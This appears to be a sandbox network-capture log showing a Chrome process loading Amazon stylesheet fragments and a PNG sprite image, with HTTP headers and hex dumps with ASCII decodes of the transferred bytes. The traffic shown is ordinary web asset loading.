                                                                                                                                                                                                                                                                      Data Ascii: rtant;line-height:20px!important}.a-size-base-plus{font-size:16px!important;line-height:24px!important}.a-size-medium{font-size:18px!important;line-height:24px!important}.a-size-medium{text-rendering:optimizeLegibility}.a-size-large{font-size:24px!importa
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 35 35 2c 32 35 35 2c 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 36 70 78 20 73 6f 6c 69 64 20 23 33 46 36 39 39 38 3b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 2d 77 69 64 74 68 3a 30 3b 77 69 64 74 68 3a 30 3b 68 65 69 67 68 74 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 3b 2d 77 65 62 6b 69 74 2d 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 74 72 61 6e 73 66 6f 72 6d 3a 74 72 61 6e 73 6c 61 74 65 33 64 28 30 2c 30 2c 30 29 3b 62 6f 72 64 65 72 2d 74 6f 70 2d 77 69 64 74 68 3a 31 30 70 78 7d 2e 61 2d 61 64 64 6f 6e 2d 62 61 64 67 65 3a 62 65 66 6f 72 65 2c 2e 61 2d 69 63 6f 6e 2d 61 64 64 6f 6e 3a 62 65 66 6f 72 65 7b 62 6f 74 74 6f 6d 3a 30 3b 62 6f 72 64 65 72 2d 73 74 79 6c
                                                                                                                                                                                                                                                                      Data Ascii: 55,255,0);border-top:6px solid #3F6998;border-bottom-width:0;width:0;height:0;font-size:0;line-height:0;-webkit-transform:translate3d(0,0,0);transform:translate3d(0,0,0);border-top-width:10px}.a-addon-badge:before,.a-icon-addon:before{bottom:0;border-styl
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 2d 31 34 32 70 78 20 2d 35 70 78 7d 2e 61 2d 73 69 7a 65 2d 73 6d 61 6c 6c 20 2e 61 2d 69 63 6f 6e 2d 70 6f 70 6f 76 65 72 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 7d 2e 61 2d 69 63 6f 6e 2d 73 65 61 72 63 68 7b 6f 70 61 63 69 74 79 3a 2e 35 35 3b 77 69 64 74 68 3a 31 33 70 78 3b 68 65 69 67 68 74 3a 31 33 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 37 31 70 78 20 2d 38 36 70 78 7d 2e 61 2d 69 63 6f 6e 2d 63 68 65 63 6b 6d 61 72 6b 2d 69 6e 76 65 72 73 65 7b 77 69 64 74 68 3a 31 35 70 78 3b 68 65 69 67 68 74 3a 31 37 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 31 37 32 70 78 20 2d 38 32 70 78 3b 6f 70 61 63 69 74 79 3a 2e 36 3b 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 36 65 6d 3b 76 65 72 74
                                                                                                                                                                                                                                                                      Data Ascii: -142px -5px}.a-size-small .a-icon-popover{margin-top:4px}.a-icon-search{opacity:.55;width:13px;height:13px;background-position:-271px -86px}.a-icon-checkmark-inverse{width:15px;height:17px;background-position:-172px -82px;opacity:.6;margin-right:.6em;vert
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 61 2d 69 63 6f 6e 2d 77 72 61 70 70 65 72 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 7d 2e 61 2d 69 63 6f 6e 2d 6a 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 68 24 30 2d 68 6f 57 4e 59 62 75 76 47 2d 35 2e 70 6e 67 29 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 32 38 70 78 20 31 36 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 31 32 38 70 78 20 31 36 70 78 7d 2e 61 2d 68 69 72 65 73 20 2e 61 2d 69 63 6f 6e 2d 6a 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74
                                                                                                                                                                                                                                                                      Data Ascii: a-icon-wrapper{display:inline-block;vertical-align:top}.a-icon-jp{background-image:url(https://m.media-amazon.com/images/S/sash/h$0-hoWNYbuvG-5.png);-webkit-background-size:128px 16px;background-size:128px 16px}.a-hires .a-icon-jp{background-image:url(htt
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 2d 73 68 61 72 65 2d 71 71 2c 2e 61 2d 73 68 61 72 65 2d 71 7a 6f 6e 65 2c 2e 61 2d 73 68 61 72 65 2d 72 65 6e 72 65 6e 2c 2e 61 2d 73 68 61 72 65 2d 73 69 6e 61 2c 2e 61 2d 73 68 61 72 65 2d 73 6d 73 2c 2e 61 2d 73 68 61 72 65 2d 74 65 6e 63 65 6e 74 2c 2e 61 2d 73 68 61 72 65 2d 74 77 69 74 74 65 72 2c 2e 61 2d 73 68 61 72 65 2d 77 65 63 68 61 74 2c 2e 61 2d 73 68 61 72 65 2d 77 68 61 74 73 61 70 70 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 5a 70 62 47 37 34 6c 61 6b 6c 67 6e 7a 2d 69 2e 70 6e 67 29 3b 2d 77 65 62 6b 69 74 2d 62 61 63 6b 67 72 6f 75 6e 64 2d 73 69 7a 65 3a 35 31 32 70 78 20 32 35 36 70 78 3b
                                                                                                                                                                                                                                                                      Data Ascii: -share-qq,.a-share-qzone,.a-share-renren,.a-share-sina,.a-share-sms,.a-share-tencent,.a-share-twitter,.a-share-wechat,.a-share-whatsapp{background-image:url(https://m.media-amazon.com/images/S/sash/ZpbG74laklgnz-i.png);-webkit-background-size:512px 256px;
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 63 6f 6e 2d 73 68 61 72 65 2d 77 65 63 68 61 74 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 69 63 6f 6e 2d 73 68 61 72 65 2d 77 68 61 74 73 61 70 70 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 69 63 6f 6e 2d 73 6d 69 6c 65 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 6c 6f 67 6f 2d 63 68 69 6e 61 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 70 72 65 6d 69 75 6d 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 70 72 65 6d 69 75 6d 2d 6e 61 76 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 70 72 69 6d 65 2d 6a 70 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 70 72 69 6d 65 2d 6a 70 2d 6e 61 76 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e 61 2d 70 72 69 6d 65 2d 6c 6f 67 6f 2c 2e 61 2d 68 69 72 65 73 20 2e
                                                                                                                                                                                                                                                                      Data Ascii: con-share-wechat,.a-hires .a-icon-share-whatsapp,.a-hires .a-icon-smile,.a-hires .a-logo,.a-hires .a-logo-china,.a-hires .a-premium-logo,.a-hires .a-premium-nav-logo,.a-hires .a-prime-jp-logo,.a-hires .a-prime-jp-nav-logo,.a-hires .a-prime-logo,.a-hires .
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 64 6f 6d 61 69 6e 2d 6a 70 3a 61 66 74 65 72 2c 2e 61 2d 69 63 6f 6e 2d 64 6f 6d 61 69 6e 2d 6a 70 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 2e 63 6f 2e 6a 70 22 7d 2e 61 2d 64 6f 6d 61 69 6e 2d 62 72 3a 61 66 74 65 72 2c 2e 61 2d 69 63 6f 6e 2d 64 6f 6d 61 69 6e 2d 62 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 2e 63 6f 6d 2e 62 72 22 7d 2e 61 2d 64 6f 6d 61 69 6e 2d 69 6e 3a 61 66 74 65 72 2c 2e 61 2d 69 63 6f 6e 2d 64 6f 6d 61 69 6e 2d 69 6e 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 2e 69 6e 22 7d 2e 61 2d 64 6f 6d 61 69 6e 2d 74 72 3a 61 66 74 65 72 2c 2e 61 2d 69 63 6f 6e 2d 64 6f 6d 61 69 6e 2d 74 72 3a 61 66 74 65 72 7b 63 6f 6e 74 65 6e 74 3a 22 2e 63 6f 6d 2e 74 72 22 7d 2e 61 2d 69 63 6f 6e 2d 64 6f 6d 61 69 6e 2d 6d 78 3a 61
                                                                                                                                                                                                                                                                      Data Ascii: domain-jp:after,.a-icon-domain-jp:after{content:".co.jp"}.a-domain-br:after,.a-icon-domain-br:after{content:".com.br"}.a-domain-in:after,.a-icon-domain-in:after{content:".in"}.a-domain-tr:after,.a-icon-domain-tr:after{content:".com.tr"}.a-icon-domain-mx:a
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 68 74 74 70 73 3a 2f 2f 6d 2e 6d 65 64 69 61 2d 61 6d 61 7a 6f 6e 2e 63 6f 6d 2f 69 6d 61 67 65 73 2f 53 2f 73 61 73 68 2f 62 6f 6a 30 75 6f 50 67 47 50 61 51 2d 51 5a 2e 70 6e 67 29 7d 2e 61 2d 69 63 6f 6e 2d 66 72 65 65 74 69 6d 65 2d 73 6d 2c 2e 61 2d 69 63 6f 6e 2d 66 72 65 65 74 69 6d 65 2e 61 2d 69 63 6f 6e 2d 73 6d 61 6c 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 35 39 70 78 20 2d 33 36 70 78 3b 68 65 69 67 68 74 3a 31 35 70 78 3b 77 69 64 74 68 3a 36 37 70 78 7d 2e 61 2d 69 63 6f 6e 2d 66 72 65 65 74 69 6d 65 2c 2e 61 2d 69 63 6f 6e 2d 66 72 65 65 74 69 6d 65 2d 6d 65 64 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 70 6f 73 69 74 69 6f 6e 3a 2d 32 70 78 20 2d 31 34
                                                                                                                                                                                                                                                                      Data Ascii: {background-image:url(https://m.media-amazon.com/images/S/sash/boj0uoPgGPaQ-QZ.png)}.a-icon-freetime-sm,.a-icon-freetime.a-icon-small{background-position:-59px -36px;height:15px;width:67px}.a-icon-freetime,.a-icon-freetime-med{background-position:-2px -14


                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                      16192.168.2.549742151.101.1.164432612C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC651OUTGET /images/G/39/gno/sprites/nav-sprite-global-1x-reorg-privacy._CB600087478_.png HTTP/1.1
                                                                                                                                                                                                                                                                      Host: m.media-amazon.com
                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                      Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                      Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                      Referer: https://www.amazon.ae/
                                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC658INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                      Content-Length: 14256
                                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                                      X-Amz-IR-Id: d9981bfa-95bf-4c37-969e-dc4760a4520f
                                                                                                                                                                                                                                                                      Cache-Control: max-age=630720000,public
                                                                                                                                                                                                                                                                      Last-Modified: Thu, 01 Jun 2023 22:09:04 GMT
                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                      Expires: Fri, 06 Nov 2043 07:13:30 GMT
                                                                                                                                                                                                                                                                      X-Nginx-Cache-Status: HIT
                                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                                      Date: Wed, 21 Aug 2024 18:28:41 GMT
                                                                                                                                                                                                                                                                      Age: 1332716
                                                                                                                                                                                                                                                                      X-Served-By: cache-iad-kiad7000066-IAD, cache-ewr-kewr1740048-EWR
                                                                                                                                                                                                                                                                      Timing-Allow-Origin: https://www.amazon.ae
                                                                                                                                                                                                                                                                      X-Cache: HIT from fastly, HIT from fastly
                                                                                                                                                                                                                                                                      Server-Timing: provider;desc="fy"
                                                                                                                                                                                                                                                                      alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 5e 00 00 01 c2 08 03 00 00 00 90 51 51 10 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 02 f4 50 4c 54 45 47 70 4c ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff d4 d4 8d ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 91 8b 49 94 c1 43 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 98 98 98 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 99 cc 33 ff ff ff 10 10 10 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
                                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR^QQgAMAasRGBPLTEGpLIC3
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 0f 9f 3d 4c 13 6f 9b 86 b5 37 65 1d ef de d2 d2 cc 93 a1 11 e8 15 87 c4 a5 d9 25 f1 cd 80 38 34 24 6e e0 99 81 21 19 ef ae b8 34 b3 21 4e 50 06 f6 75 31 32 8f 11 4a 19 53 e2 96 b9 96 f6 6b 11 2a 3f c1 9a 01 bc d2 56 39 f8 dc f4 fb a8 1e 74 8c b5 06 a5 93 a9 da bb a3 e5 31 41 f8 f7 00 e0 f9 ce ed b5 0f f3 6b 8f 77 c6 00 c6 8e fe 99 9a 17 e6 9f 3f ff 57 10 3e ad 03 3c db 16 04 e1 69 9a a2 e1 0b a4 4e 37 6d bc 7f 89 9f 31 33 0c 23 5e f1 cd 30 7c 16 c5 89 45 a8 98 15 5f 9c c1 3b 22 ee d2 d6 6b f4 46 98 83 01 c4 5a 49 78 99 4a 83 ff fa 91 b8 0a 6c 4e d6 55 ea 08 32 0d 66 63 af 37 84 c7 1d a0 47 ee 93 11 66 25 bc ac df cf 58 57 ea c9 42 6c 9f be 22 c9 75 78 2c dc 9d 17 84 b5 db c2 5d 80 bb 82 f0 7e 1b f7 e6 c7 3e 09 c2 6d 58 bf 2b 6c df 3e 12 be 5c 79 37 a3 c1
                                                                                                                                                                                                                                                                      Data Ascii: =Lo7e%84$n!4!NPu12JSk*?V9t1Akw?W><iN7m13#^0|E_;"kFZIxJlNU2fc7Gf%XWBl"ux,]~>mX+l>\y7
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 2d f7 db 20 2b 66 0b 5f d2 98 1f b4 3a fb bb c3 3f f6 80 8c e3 e5 92 e5 a9 49 01 6f 71 42 52 37 8f 74 ad 82 ef 70 bc 9b c7 9b 84 17 2b 78 36 98 a5 fe ab e2 44 f3 85 a2 ae df 52 28 46 59 e3 0f 76 ef 3e 5f cb 2c de 40 c8 a2 f2 d2 37 2f 30 99 1c fc 15 a6 4d 7d 58 d4 4c 26 0a 0c f6 4d 49 3b 40 53 c8 44 dd 22 b6 fb 09 67 c4 92 8c c9 17 c7 94 6e 6b 6d 38 64 aa 04 f5 82 db 6c d9 b4 87 92 35 e4 e5 21 a9 c9 16 df d6 ea 72 c3 05 e7 d4 ae a6 18 b3 ff 4a 5d d7 72 d5 96 51 6b 2b 4b 29 e8 4d d3 b4 f7 83 e6 c3 d8 39 89 0e cf 59 aa 7b 14 5d ea 9c c6 6b bb 53 d0 4d 1d 5b 59 b4 0e 8c 73 82 75 73 05 a7 09 57 87 63 5b d8 32 42 dd b5 d6 42 4e e3 75 91 08 5b 6c 59 4d b4 36 36 ca b5 be 2b 11 f2 36 17 86 0e ad bc e7 c3 1a d3 82 dd 9d f1 b2 f8 43 63 6d 1a 16 29 ce 68 6a ee 60 4d
                                                                                                                                                                                                                                                                      Data Ascii: - +f_:?IoqBR7tp+x6DR(FYv>_,@7/0M}XL&MI;@SD"gnkm8dl5!rJ]rQk+K)M9Y{]kSM[YsusWc[2BBNu[lYM66+6Ccm)hj`M
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: cf 3e 82 83 2d dc 0e 03 9b cd d5 45 e1 05 33 62 51 c5 ec 38 19 6f 0d 14 fe 10 92 43 87 8a af 47 4d 6a e3 b2 c6 06 70 ee 2a 91 70 a8 50 b0 ed ad 28 b6 25 14 bc 1a 86 57 94 88 83 46 23 0c af c1 3a 6a 66 0b be 9d 74 d2 fb c5 e3 f5 a8 76 02 28 66 d2 89 78 5d 90 4d e1 2e 50 cc 0c 18 ec f3 2f 41 f9 3d 9a 70 60 4f 08 a0 4a b4 94 08 6f 85 82 6d 4e 6a d7 25 69 b8 00 6f bd 55 3f 4d 25 66 b1 5a e3 d5 66 c9 da 37 40 53 c5 e3 b5 aa 4b 18 96 dd 77 9c 84 17 55 2e f0 28 80 01 d1 df 4d 54 73 19 34 af a4 13 a7 b4 47 35 d7 3c 42 c9 96 b6 8a 04 db 84 51 2a 0e f5 8f be 65 78 1f 2b 78 87 29 1f 1c 5d 6e a3 cd 1f ef d7 1b 12 74 d9 3a e4 2b 1e 2f 98 61 cd ce 18 16 04 d2 b0 70 02 5e 9c 97 8e be 98 e2 6a a8 d6 99 0b 02 d6 5e a8 1c a4 34 19 6b b3 2b 32 b8 74 9a 43 25 86 a9 cb 6f 36
                                                                                                                                                                                                                                                                      Data Ascii: >-E3bQ8oCGMjp*pP(%WF#:jftv(fx]M.P/A=p`OJomNj%ioU?M%fZf7@SKwU.(MTs4G5<BQ*ex+x)]nt:+/ap^j^4k+2tC%o6
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 2d 09 15 af 0b 85 e9 19 f0 42 bc b6 5e 0c a8 09 35 88 b5 39 af 98 c5 34 0e 8f c7 11 87 73 0a 71 e8 9a a9 55 ce 70 d5 f1 0a 98 e4 72 06 bc b5 aa 78 1e d2 28 ba 59 52 0d df 22 5e 7d ae 86 f3 06 9a c9 1a 36 d7 25 dd e5 c2 7b 70 50 55 7a bc 26 6c 5e 7a 06 bc 9d ec 9e 37 0f 46 72 2e ed 14 76 7e 55 f1 2e 31 1d 2e e2 f2 4d e1 39 db 28 75 34 a9 49 1e 57 76 a8 78 a7 99 2c f5 9d 05 af 10 c0 e5 ee 1b f3 39 9a c5 db ab a4 3c 72 ca 39 87 99 82 86 21 e0 ab 8d 77 28 d4 94 0a a0 56 70 06 bc c0 91 0f 4d 46 9b 2c 8a 8d 11 13 d9 cf 5b 73 c6 7e c0 db ce 26 6c b7 7e 20 a8 e0 bd a1 2a c3 57 1c af 32 e2 1d 67 c3 6b 96 0a b2 c1 49 5e 57 06 92 63 b4 40 f6 12 17 4f cb dc 8e ef 52 e0 35 42 b6 3c 44 09 c9 a4 28 0e 29 86 ae 28 7a cc a4 db 23 8a 9d 70 97 8b 22 98 68 16 51 84 b4 5b 5f
                                                                                                                                                                                                                                                                      Data Ascii: -B^594sqUprx(YR"^}6%{pPUz&l^z7Fr.v~U.1.M9(u4IWvx,9<r9!w(VpMF,[s~&l~ *W2gkI^Wc@OR5B<D()(z#p"hQ[_
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 7e d3 72 6e 08 5e e5 3b 53 0b 03 5c 8f 93 e6 a5 af f4 2c cc 0d 0c e8 40 df c0 f0 c2 ab 95 35 92 8a 3a 81 7c b3 73 44 e5 37 3c f1 f2 d4 50 27 59 df 38 42 6a 78 35 10 ef da dc 2d 67 72 dc 78 f6 bf b3 d7 15 bc 08 62 3b 75 d2 4d 3a b2 64 da 8a a7 ed 8d 5d e4 13 a8 09 bc 08 f0 74 2e 99 b7 b7 df d9 db 2b e7 f8 f6 92 8c f4 f7 23 73 aa be d9 39 b9 9c 9c 8c f7 7b 3a fd bb 27 5b 2f b8 d6 be 7d ff 89 ce 71 f0 ea f4 71 5a d9 e3 57 44 76 e9 ae a8 cc 34 6b 04 2f 72 11 79 79 d3 23 1f 64 97 3c a7 2e dd 3b 0f 45 f1 f4 5d cc 8b e2 3d ad e0 c5 8b 77 17 c8 52 d2 f3 36 c5 39 5c d8 51 61 11 4f 61 5a 44 f1 52 f3 c9 da c3 8b a3 88 9e c5 09 92 36 3d 32 38 ba 56 b9 ac 69 34 a6 3d 6c 23 e6 78 9f e0 3d be 13 ef 35 ec 93 cf 03 32 4b ff 37 f2 d3 57 a9 d1 92 1a 54 ad 4b e4 c1 b4 87 64
                                                                                                                                                                                                                                                                      Data Ascii: ~rn^;S\,@5:|sD7<P'Y8Bjx5-grxb;uM:d]t.+#s9{:'[/}qqZWDv4k/ryy#d<.;E]=wR69\QaOaZDR6=28Vi4=l#x=52K7WTKd
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 1c 84 f7 43 6e 08 d4 0c 5e 9d 2f 9d de 1e ee 4c e9 b4 dd b2 03 6f 64 e7 c9 32 35 2e 7d 11 2f 3a f2 4a 72 56 00 ae 31 33 0b a1 3f 93 c9 f8 4c 7c d4 95 4a 1a f5 99 94 75 0a 47 5d 3a a3 cb 0a ad 8e b8 ec 34 85 60 12 da 1c 7c c4 00 15 bc fa 8c 03 da 52 c6 83 6e c7 fb e6 67 b6 b2 d9 80 c7 e3 41 cc 66 3c 1e 3d d8 f0 8c 79 d0 09 cb 7c 00 87 13 81 0d 72 d9 fa 24 09 2e 3c 69 8a 97 db 24 fb 9e b2 01 7f c4 fd c1 7a a4 c1 2f e0 75 92 69 c5 a0 34 81 5e f4 3d 0b 6a e2 cd 25 8b 18 05 fa e2 82 6e 74 6c 0a 98 52 f2 89 24 31 53 5e de b3 da 14 bc 82 9c 41 6d 38 e0 1d 56 b3 8a c6 00 18 cb 66 d3 33 78 1b 19 eb a4 72 1c 5b f6 27 65 67 86 e0 9d 0c c8 bb 93 5c 99 7f a0 24 f5 8f f6 4b d2 82 3c 43 c3 44 c9 14 b8 4f 92 74 f2 b1 09 34 af d3 83 e1 7e 3a 6d 5b 53 13 af 80 f3 cc 83 5e
                                                                                                                                                                                                                                                                      Data Ascii: Cn^/Lod25.}/:JrV13?L|JuG]:4`|RngAf<=y|r$.<i$z/ui4^=j%ntlR$1S^Am8Vf3xr['eg\$K<CDOt4~:m[S^
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: b7 be fd ed 6f 5d f6 fe 74 56 9b 35 1f 5a 6d a3 1a cc 2c b3 51 78 f7 5e b9 f2 d5 56 c4 9b c2 72 46 b9 f1 aa 61 65 e4 00 a0 f7 3c 7a bf 5d b2 c1 be 77 4b e2 65 39 28 b3 59 dc 9b 97 11 18 af 72 54 bc d6 b8 37 77 ef e2 84 0e cf e4 86 5c 7f 78 f7 ee dd 22 78 69 2c 96 83 ef 05 2c 19 1d 21 d5 d2 4e 21 71 cc 76 cc 88 76 57 4a 55 89 2f ee 36 1d 6d cb 45 3c 26 f5 15 4e 89 fe e1 0c 21 f7 6e 92 7d 27 0f 7e b7 87 62 dc e3 70 5e 61 c3 bf 7b ee 98 bc 78 6f 5c c1 99 51 5b 25 20 53 d2 d6 58 b9 1e 8c a9 24 d5 4a 03 04 6a a0 ea 26 62 6e 00 a8 5c d7 3d e5 3a 9c bd d7 2f e1 64 05 a7 13 a7 a2 3b 9d 1f 9f 71 3a 0f ba 27 32 38 9d b9 1e bc fb 68 25 5c 61 d3 f9 b6 40 60 46 cf ff e2 56 a5 91 99 ec 61 68 e9 ef 00 e8 38 0e 2d f5 00 8a f5 dd d3 4d 36 0f 7a c7 59 a4 88 8f 8d fd cb 41
                                                                                                                                                                                                                                                                      Data Ascii: o]tV5Zm,Qx^VrFae<z]wKe9(YrT7w\x"xi,,!N!qvvWJU/6mE<&N!n}'~bp^a{xo\Q[% SX$Jj&bn\=:/d;q:'28h%\a@`FVah8-M6zYA
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: 39 e1 7a c8 39 45 aa cf 8f b8 ba 47 02 3e 7d fe b3 9f 87 6f df 76 8d 70 4c 91 fb 87 fb b3 ae d9 e1 4f fd 10 de 7d e2 f1 ac 6b 78 f7 7d 17 4f b1 b0 16 5d 7d 4c fd ab ab fb e1 c8 ed cf 3d 63 c2 bb 6f 7f 7a ee 22 5d d9 f5 33 21 17 1f 73 44 6b f4 c0 0c 30 aa ab bb fb 62 77 d7 ac f0 cf 17 23 f8 b4 c3 2e 9e b8 62 ed 2e 78 e4 a2 6b a9 ba 1e 7e c3 6c f9 c1 55 4e 67 3d b4 fb c4 d7 c3 dd b3 d4 70 67 bf 38 f2 70 e4 01 7f 66 04 17 17 17 17 17 d7 2a 05 7e 14 f2 33 25 9c 1b c7 cb c5 c5 c5 c5 c5 b5 ea cb 1f bf b4 71 bc 31 13 98 71 71 bc 5c 5c 5c fc d2 c6 f1 72 71 71 f1 c0 8c 8b e3 e5 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 e2 da fa 92 3c 09 b6 f5 4d 80 f5 16 d9 d2 ff 65 3c 13 aa 7f 7d 34 ff 34 f0 c6 d7 35 3f f9 a7 db a0 5c c2 57 26 6a 88 66 be cf c7 67 a6
                                                                                                                                                                                                                                                                      Data Ascii: 9z9EG>}ovpLO}kx}O]}L=coz"]3!sDk0bw#.b.xk~lUNg=pg8pf*~3%q1qq\\\rqq<Me<}445?\W&jfg
                                                                                                                                                                                                                                                                      2024-08-21 18:28:41 UTC1378INData Raw: aa dd 31 c3 9f 6e bc ff 75 c7 0f d5 c1 f8 ce af 82 6e 60 f3 ed a7 eb 1b c3 3e b7 11 8e b8 ea 1a 5a 6f 6d b2 67 d1 b6 4a e3 15 6a 68 bb 9f f5 07 82 d5 4f 3d 88 69 05 e2 15 24 07 4a 89 2a d0 ec 74 49 e0 19 e6 6a f0 6b bd a0 26 41 ed f7 d0 2a 8e 08 8b 6e 5d b9 ba 30 6c e3 8d 10 ce ca 1a 5a 39 3f f7 ff ed 9d cd 4f 1a 69 1c c7 1f bb 88 42 75 60 51 71 15 a6 89 d6 95 a0 14 d6 da ac 15 d7 b8 86 80 07 63 62 82 17 13 d3 78 d2 f0 2f 78 dc 83 7f c2 de 9a 34 5e d6 13 09 9e 3c 35 de d4 db da 43 bb cd be e4 b9 c8 01 c1 55 bb 76 53 f7 b2 cf 33 30 30 cc 0c 03 f3 cc 20 2f fe 3e 69 35 a3 95 c2 e7 f9 f2 bc cc cc f3 73 82 d3 6a 1f 0f 7e 8c 82 78 5d 78 2b 06 d1 2c 1e d0 dd e7 07 0b 3a cb fb 5e ed a1 e4 d5 2f b5 d8 cd c7 77 5c 65 34 c6 fa 37 e0 b1 c8 51 b6 90 4d f1 d5 4d cd f6
                                                                                                                                                                                                                                                                      Data Ascii: 1nun`>ZomgJjhO=i$J*tIjk&A*n]0lZ9?OiBu`Qqcbx/x4^<5CUvS300 />i5sj~x]x+,:^/w\e47QMM


